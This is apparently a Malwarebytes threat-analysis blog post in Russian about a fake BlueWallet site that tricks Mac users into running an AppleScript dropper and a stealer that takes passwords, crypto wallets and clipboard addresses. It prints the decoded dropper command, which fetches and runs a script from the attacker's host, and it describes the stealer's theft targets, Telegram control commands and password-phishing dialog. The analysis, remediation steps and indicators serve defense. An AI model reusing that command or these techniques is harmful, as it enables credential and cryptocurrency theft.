Privacy, Мошенничество, Информация об угрозах

Вредоносная программа Fake BlueWallet похищает пароли, учетные записи и криптовалюту с компьютеров Mac

Автор: Стефан Дасич | 1 июня 2026 г.
Вредоносная программа Fake BlueWallet похищает пароли, учетные записи и криптовалюту с компьютеров Mac

Поддельный веб-сайт, выдающий себя за BlueWallet (настоящий биткойн-кошелек), нацелен на Mac и использует простую, но эффективную схему атаки. Сам BlueWallet не подвергся взлому. Вместо этого киберпреступники узурпировали название и брендинг легитимного биткойн-кошелька, чтобы сделать вредоносную загрузку более достоверной.

Если вы искали кошелек для криптовалюты и попали на одну из этих поддельных страниц загрузки BlueWallet, сайт пытался обманом заставить вас открыть загруженный файл во встроенном инструменте macOS и нажать «Запустить». Если вы последовали этим инструкциям, вредоносное ПО могло похитить сохраненные пароли, учетные данные браузера, адреса криптовалютных кошельков, документы и другие конфиденциальные данные. Кроме того, оно отслеживает буфер обмена на наличие адресов криптовалютных кошельков и может заменить их адресами, контролируемыми злоумышленниками.

Эта последняя особенность особенно опасна. Если вы скопируете адрес кошелька перед отправкой средств, вредоносное ПО может незаметно заменить его адресом злоумышленника. На экране всё выглядит нормально, но деньги поступают в другое место.

Стоит ли беспокоиться? Только в том случае, если вы скачали и запустили этот файл. Простое посещение страницы и её закрытие само по себе ничего не вызывает. Атака полностью зависит от того, откроет ли пользователь скрипт и нажмёт ли кнопку «Воспроизвести».

Если вы все же запустили эту программу, считайте, что компьютер заражен, и выполните следующие действия.

Что делать, если вы, возможно, запустили его

Если вы открыли файл и нажали кнопку «Воспроизвести», считайте, что ваше устройство было взломано, и выполните следующие действия:

  • Отключите устройство от сети, чтобы прервать связь по каналу управления
  • Проведите полное сканирование устройства и убедитесь, что вы используете обновленное программное обеспечение для защиты с включенной функцией веб-защиты
  • С другого надежного устройства смените пароли для всех учетных записей, используемых на Mac, начиная с электронной почты и криптовалютных бирж
  • Перенесите любую криптовалюту на новый кошелек, созданный на чистом устройстве
  • Рассматривайте имеющиеся семенные фразы и ключи как уязвимые
  • Прежде чем отправлять криптовалюту в будущем, проверяйте полный адрес получателя символ за символом
  • Проверьте наличие незнакомых файлов в ~/Library/LaunchAgents
  • Найдите спрятанный .sysupd.sh файл в /tmp
  • Следует менять облачные учетные данные и учетные данные SSH, если .ssh, .aws, или .gnupg на компьютере были файлы
  • Если у вас есть сомнения, лучше сделайте резервную копию данных и переустановите macOS с надежного источника, чем пытаться выполнить чистую переустановку на существующей системе

Купили что-то, чего не следовало?

Приемы социальной инженерии

Самое интересное в этой атаке — не техническая сторона. Злоумышленники не взломали Mac не обошли системы защиты Apple. Они просто убедили жертв самостоятельно запустить вредоносное ПО.

Поддельный веб-сайт сопровождает пользователей на протяжении всего процесса с помощью убедительной страницы загрузки, простых инструкций и даже сочетания клавиш. Атака увенчивается успехом, поскольку жертва доверяет тому, что видит.

По мере того как операционные системы становятся все более эффективными в блокировании вредоносного ПО, злоумышленники все чаще делают ставку на социальную инженерию. Вместо того чтобы искать способы обойти системы безопасности, они убеждают людей нажимать на ссылки, минуя эти системы.

Именно поэтому все большее значение приобретает одна привычка: с осторожностью относитесь к любым загрузкам, которые сопровождаются инструкциями открыть их в среде сценариев, утилите для разработчиков или окне терминала и нажать «Запустить».

В ходе этой кампании одного нажатия клавиш ⌘R было достаточно, чтобы превратить Mac инструмент для кражи паролей, кошельков с криптовалютой и данных из буфера обмена, а также в средство удаленного доступа.

Технический анализ

Первый этап: программа для загрузки AppleScript

Страница находится по адресу update-bluewallet[.]com, доменное имя, достаточно похожее на настоящий кошелек (bluewallet.io) при беглом просмотре. Первое, что делает эта страница, — это не дожидается согласия. Ее скрипт запускает процедуру загрузки с двухсекундным таймером сразу после загрузки страницы, а также повторно, если посетитель нажмет любую из двух кнопок.

Файл, который попадает в папку «Загрузки», называется BlueWallet Installer.applescript— расширение, которое большинство людей никогда не видели и к которому у них нет инстинктивного недоверия.

Затем страница делает нечто незаметно хитрое. С небольшой задержкой она переписывает свой собственный текст статуса, превращая его в инструкцию по настройке: запустить установщик, а затем нажать кнопку воспроизведения или ⌘R. Она даже рисует в тексте маленький синий треугольник воспроизведения, чтобы формулировка соответствовала реальному интерфейсу Script Editor, который жертва увидит вскоре.

Поддельный сайт BlueWallet, который помогает жертве загрузить и запустить вредоносный скрипт

На этой странице жертве подробно объясняется, какие именно действия необходимо выполнить для запуска файла.

В современной macOS приложение без подписи, загруженное из Интернета, попадает в карантин и проходит проверку, прежде чем его можно будет запустить. Простой скрипт, открытый в «Редакторе скриптов» и запущенный пользователем, обходит этот процесс. Пользователь вручную дает указание доверенному инструменту Apple запустить код, поэтому здесь нет этапа проверки подписи, на котором могла бы произойти сбой.

Именно поэтому злоумышленник выбрал AppleScript вместо готового приложения: таким образом рискованное действие переходит из рук операционной системы в руки жертвы.

Сам скрипт AppleScript удивительно короткий. Если удалить из него все лишние комментарии, включая поддельный номер версии и строку, в которой говорится о «обновлении установки Brew», он выполняет всего одну команду оболочки, закодированную в формате base64, а затем дает команду Script Editor закрыться без сохранения, тем самым скрывая следы своей работы.

Установка, обновление и обновление

Если расшифровать, эта команда выполняет следующее:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

Он загружает второй скрипт с удаленного хоста, сохраняет его в скрытом файле в временном каталоге, присваивает ему права на выполнение и запускает его в фоновом режиме с подавлением всего вывода.

Жертва ничего не видит. Имя файла .sysupd.sh замаскирован под системное обновление. Это классический пример многоэтапного дроппера: первый этап представляет собой крошечную одноразовую программу, единственная задача которой — загрузить собственно полезную нагрузку.

Этап второй: анализ полезной нагрузки

В первых строках описывается, как вредоносная программа планирует работать. Она устанавливает umask 077 поэтому все создаваемые им файлы доступны для чтения только уязвимому пользователю, после чего он создает скрытый рабочий каталог со случайным именем в папке /tmp посеянный из /dev/urandom.

Её код запутыван, но не слишком тщательно. Небольшая функция с именем _xd проходит по шестнадцатеричной строке по два символа за раз и выполняет операцию XOR для каждого байта с жестко запрограммированным повторяющимся ключом: swckR9JCD2Uu.

Эта функция декодирует токен бота Telegram, идентификатор чата, токен вторичной команды и промежуточный URL-адрес во время выполнения. Этого достаточно, чтобы обойти инструменты, которые ищут только строки в виде открытого текста, но не более того. Поскольку и ключ, и алгоритм находятся в файле, каждое закодированное значение можно полностью восстановить.

Обращает на себя внимание одна деталь: расшифрованные данные чата Telegram и расшифрованные данные командно-контрольного канала совпадают. Злоумышленник использует один и тот же канал Telegram и для передачи похищенных данных, и для управления. Это недорогой, масштабируемый и зашифрованный способ, который маскируется под обычный HTTPS-трафик.

Не все данные зашифрованы. Адреса, используемые для перехвата содержимого буфера обмена, хранятся в файле в виде открытого текста: адрес Bitcoin, адрес Ethereum и адрес Solana. Именно эти адреса имплантируемый код подставляет, когда обнаруживает, что вы копируете адрес кошелька. Поскольку они являются публичными в соответствующих блокчейнах, они также являются одними из самых полезных элементов во всем образце.

Что похищает вредоносная программа

Алгоритмы сбора данных на втором этапе носят всеобъемлющий характер. Они охватывают шесть общих категорий.

1. Веб-браузеры

Скрипт извлекает историю просмотров, файлы cookie, данные для входа и закладки из множества браузеров, в том числе:

  • Браузеры на базе Chromium: Google Chrome , бета-версия, Canary и Dev); Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; и «Яндекс»
  • Браузеры на базе Firefox: Firefox, Waterfox, Pale Moon, Zen и LibreWolf
  • Данные встроенного браузера macOS: файлы cookie Safari, история посещений и значения полей форм

2. Криптовалютные кошельки

Похоже, это является основной темой сценария.

В число целей входят приложения для настольных кошельков, в том числе Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop и Tonkeeper.

Кроме того, он ориентирован на кошельки в виде расширений для браузеров в нескольких экосистемах:

  • Биткойн: Xverse , Leather, UniSat, Alby и Wizz
  • Solana: Phantom , Solflare, Backpack, Nightly, MagicEden, Sollet и Slope
  • Кошельки EVM: MetaMask , Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin и XDEFI
  • Космос: «Кеплер» , «Станция» и «Космостанция»
  • Другие экосистемы: Yoroi , Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos и Temple

3. Менеджеры паролей и средства безопасности

Вредоносное ПО нацелено на локальные хранилища и настройки нескольких менеджеров паролей, в том числе LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt и Buttercup.

Кроме того, он ищет данные, связанные с двухфакторной аутентификацией (2FA) и приложениями-аутентификаторами, включая Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS и FreeOTP.

4. Приложения для общения и социальных сетей

Скрипт пытается скопировать данные сеанса и локальное хранилище для Telegram Desktop и Discord, включая Discord Canary и Discord PTB.

5. Инструменты для разработчиков и облачные инструменты

Он ищет учетные данные и файлы конфигурации в домашнем каталоге пользователя, в том числе:

  • Настройки AWS CLI в .aws
  • SSH-ключи .ssh
  • Ключи GnuPG в .gnupg
  • Конфигурации Kubernetes в .kube
  • Файлы Shell и Git, включая .zshrc, .zsh_history, .bash_history, и .gitconfig

6. Приложения для повышения продуктивности и общие файлы

Скрипт копирует локальную базу данных Apple Notes, NoteStore.sqlite.

Кроме того, он ищет данные расширений браузера, связанные с инструментами для покупок и повышения продуктивности, в том числе Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist и Google Keep.

Наконец, программа сканирует папки «Рабочий стол», «Документы» и «Загрузки» в поисках файлов с расширениями, включая .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, и .env, при соблюдении ограничения по размеру.

Что он делает с похищенными данными

Вредоносная программа пытается напрямую перехватить пароль учетной записи пользователя. osascript В диалоговом окне «Системные настройки» пользователю предлагается ввести пароль заново, «чтобы продолжить». Скрипт проверяет каждую попытку на соответствие dscl . authonly перед сохранением, поэтому процесс останавливается только после получения действительных учетных данных.

Для экстракции данных система архивирует промежуточные данные с помощью встроенных средств macOS ditto, вероятно, потому что он всегда присутствует, в отличие от zip. Чтобы не превысить установленный в Telegram лимит на загрузку в 50 МБ, программа разбивает большие архивы на части по 49 МБ с помощью split перед отправкой каждой детали.

Он обеспечивает постоянное действие путем записи файла plist LaunchAgent в каталог пользователя ~/Library/LaunchAgents, опираясь на скрытый каталог поддержки, и загружая его с помощью launchctl чтобы имплантант запускался заново при каждом входе в систему.

«Clipboard Hijack» — это циклическое видео, воспроизводимое в фоновом режиме. A clip_watch Функция постоянно отслеживает содержимое буфера обмена, с помощью регулярных выражений выявляет адреса в форматах Bitcoin, Ethereum и Solana, передает исходный адрес по каналу управления и заменяет его в буфере обмена адресом злоумышленника с помощью pbcopy.

Это означает, что замена происходит незаметно в процессе копирования и вставки.

Наконец, вредоносным программам можно управлять в интерактивном режиме. A c2_loop запрашивает команды у бота в Telegram и поддерживает полный набор инструментов оператора:

  • /info подробная информация о системе
  • /exec для произвольных команд оболочки
  • /clipboard чтобы прочитать текущее содержимое буфера обмена
  • /download извлечь определенные файлы
  • /exfil чтобы запустить модуль по кражам заново
  • /selfdestruct чтобы стереть следы

Благодаря этому канал Telegram становится каналом связи для удаленного управления в режиме реального времени, а не просто средством односторонней передачи информации.

Живя за счёт того, что даёт земля, и за счёт Telegram

Здесь наблюдается уже знакомая и все более распространенная тенденция: полагаться на проверенные инструменты.

Для доставки используется собственный редактор скриптов Apple. Конфигурация скрыта за простым оператором XOR, а не в сжатых бинарных файлах. Канал передачи команд использует API ботов Telegram, который позволяет обойти исходящие фильтры, которые могли бы заблокировать неизвестный сервер.

Ни один из этих элементов сам по себе не является чем-то новым. Эффективность заключается в том, что компоненты, выглядящие вполне законными, комбинируются таким образом, что ни один из шагов не вызывает подозрений.

Возможности обнаружения

Здесь речь идет не столько о приманке, сколько о самой технике.

Редактор скриптов, выполняющий однострочный код Base64 do shell script программа, которая сразу же завершает работу, является явным сигналом о подозрительном поведении и гораздо более подходящей целью для обнаружения, чем одноразовый файл первого уровня. То же самое касается скрытого /tmp/.sysupd.sh загружено curl и запускается в фоновом режиме.

Браузеры и платформы для загрузки могут обрабатывать .applescript файлы, поступающие из Интернета, с той же настороженностью, что и исполняемые файлы. А Telegram по-прежнему остается недостаточно контролируемой платформой для управления ботами, и система сообщения о злоупотреблениях с токенами ботов могла бы пресекать такие нарушения на корню.

Признаки взлома

Хэши файлов (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Сетевые индикаторы

  • update-bluewallet[.]com
  • projects2026box[.]com

Адреса, подверженные перехвату буфера обмена

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Мы не просто сообщаем об угрозах - мы их устраняем

Риски кибербезопасности не должны выходить за рамки заголовка. Загрузите Malwarebytes сегодня, чтобы предотвратить угрозы на своих устройствах.

Об авторе

Стефан Дашич

Стефан Дашич

Увлеченный антивирусными решениями, Стефан с раннего возраста участвовал в тестировании вредоносных программ и контроле качества AV-продуктов. Став частью команды Malwarebytes , Стефан посвящает себя защите клиентов и обеспечению их безопасности.

ПОСЛЕДНИЕ СТАТЬИ

Новости
неделя безопасности

Неделя в сфере безопасности (с 25 по 31 мая)

Июнь 1, 2026

Список тем, которые мы рассмотрели в период с 25 по 31 мая 2026 года

Подкаст
Иллюстрированный навесной замок установлен в микрофонную стойку, из которой исходят звуковые волны.

Приложения для оплаты следят за тем, что вы говорите (Lock and Code, 7 сезон, 11 серия)

Май 31, 2026

На этой неделе в подкасте «Lock and Code» мы беседуем с Рейни Рейтман о финансовой цензуре, из-за которой пользователей исключают из крупных платежных приложений.

Новости
Логотип Signal

Пользователи Signal стали мишенью фишинговых атак, направленных на кражу резервных копий

Май 29, 2026

Киберпреступники выдают себя за службу поддержки Signal, чтобы похитить ключи восстановления резервных копий, что дает им доступ ко всем архивам сообщений жертв.

Сопутствующие статьи

Значок вкладчика

Вкладчики

Значок центра угроз

Центр защиты от угроз

Значок подкастов

Подкаст

Значок глоссария

Глоссарий

Значок мошенничества

Аферы